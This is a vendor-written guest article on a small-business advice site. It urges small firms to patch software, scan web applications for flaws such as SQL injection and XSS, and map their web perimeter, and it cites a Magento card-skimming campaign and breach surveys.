Why small businesses must stay on top of web application security

Nearly 6,000 retail sites were recently compromised by credit-card theft, after attackers injected malicious JavaScript code into their e-commerce websites to steal payment card data.

While compared to the 500 million user details breached at Yahoo it may seem but a small number, however this hack has highlighted the significant risk that cybercrime poses to small businesses.

The latest Government Security Breaches Survey has highlighted the fact that small businesses are at increased risk from cyber-attacks, with nearly three-quarters of small firms reporting a security breach in 2015; a year-on-year increase from the 2013 and 2014 surveys. So what can small business owners do to protect themselves?

Understanding of cyber-security issues remains low

Despite the growing threat, understanding of cybersecurity remains low among small business owners, research conducted by the government’s Cyber Streetwise campaign found that two thirds of SMBs don’t consider their business to be vulnerable.

Too frequently, cybersecurity processes are reduced to simple anti-virus software or a traditional firewall, ignoring some of the key threats that web-facing organisations are exposed to.

In the Magneto card skimming case, for instance, many of the retailers affected were small and simply did not have access to the necessary resources to determine whether their website was secure. Web application attacks account for over 40% of incidents which result in a data breach, according to the Verizon DBIR 2016, and are the single biggest source of data loss.

Hackers are leveraging the fact that small firms are typically not staying on top of the need to patch their software – both that are developed internally and externally. In this latest case, Magento’s e-commerce shopping cart was the centre of attention.

However, both the commercial and community (free) versions of this extremely popular purchasing software have patches that are available to address the vulnerability. So whilst the publishers of the software appear responsive to providing secure patches, these are simply not being applied or are just ineffective.

RELATED: Automated cyber-attacks targeting small businesses – 10 steps to protect yourself

Who do we blame?

What do we do about this situation? We could blame the open source-community, retailers, hosting providers or even government. The truth is, the more we look for a single silver bullet, the further we move away from an answer.

Veracode’s own research has found, for example, that as many as 25% of all Java applications are susceptible to Apache Commons Collections (v3.2.1). The vulnerability is highly exploitable, yet finds its way into not only web applications, but also the application servers. This does not mean that Open Source software is bad, but organisations must do their homework to ensure that their software is robustly secure.

There is a danger that consumer confidence will reach a point of no-return when it comes to transacting and providing private information on the Internet.

Regulations that encourage companies to test for vulnerabilities should be introduced to ensure that all organisations are accounting for this common attack vector. And, yes, there should also be consequences for firms that are cavalier with customers’ data – government could do much more in this area.

Hosting providers should be asked to do more to detect and protect sites by promoting best practice patching practices, with financial incentives made available to firms that can demonstrate they are taking security seriously.

What can businesses do to improve cybersecurity?

Hackers are constantly looking for vulnerable code in software to exploit for malicious gains. Meanwhile, cybersecurity and software companies are constantly providing updates and patches to remediate malicious code as soon as it’s identified, stopping cybercriminals in their tracks.

Organisations should regularly analyse web applications to ensure that their code doesn’t contain common exploits, such as SQL injection (SQLi) or Cross-Site Scripting (XSS). These vulnerabilities, which have been listed in the OWASP top 10 list of prolific flaws for the best part of the past decade, can have severe consequences for organisations – as TalkTalk will testify to following its 2015 mega breach.

Both static analysis, which tests applications without executing them, and dynamic analysis, which identifies vulnerabilities while apps are running, can help organisations detect and remediate security flaws.

RELATED: The ways small businesses can protect themselves from hackers

Frequently scan apps for vulnerabilities

For companies that are developing their own applications – whether for internal or external use – it is essential that they are frequently scanned for vulnerabilities. It is not enough to test once and assume the application is perpetually secure. New vulnerabilities are found all the time, so frequent scanning and rescanning of applications is recommended.

However, a challenge for even those organisations which understand the threat web application vulnerabilities can pose is identifying all the apps that need to be scanned. While the application footprint may be much lower for the average SMB, unused blogs or microsites for old competitions, for example, can leave an organisation vulnerable to exploitation.

Identifying the entire web perimeter is an essential step for any organisation seeking to remediate this threat. Whether ensuring all applications are then frequently scanned or shutting down those that are no longer in use, full visibility into the web perimeter can help significantly reduce cyber risk.

The time to react

Small businesses cannot afford to neglect the threat that vulnerable web facing applications pose, because cybercriminals have caught on and are taking advantage of the ‘head in the sand’ approach taken by many companies.

Taking simple steps, such as ensuring that patches are being installed and software is updated to supported versions, is one small step that business owners can take to significantly reduce the threat of cybercrime to their business.

About the author

This article has been written exclusively for ByteStart by Paul Farrington, manager of EMEA solution architects at Veracode, a leader in securing the world’s software.

More from ByteStart

ByteStart is packed with help and tips on all aspects of running a small business, from technology to tax. Check out some of our most popular guides;

Funding your business

Tax & Accounting

Promoting your business

Leading a business

Legal issues

Bytestart Limited info@ByteStart.co.uk

Comments are closed.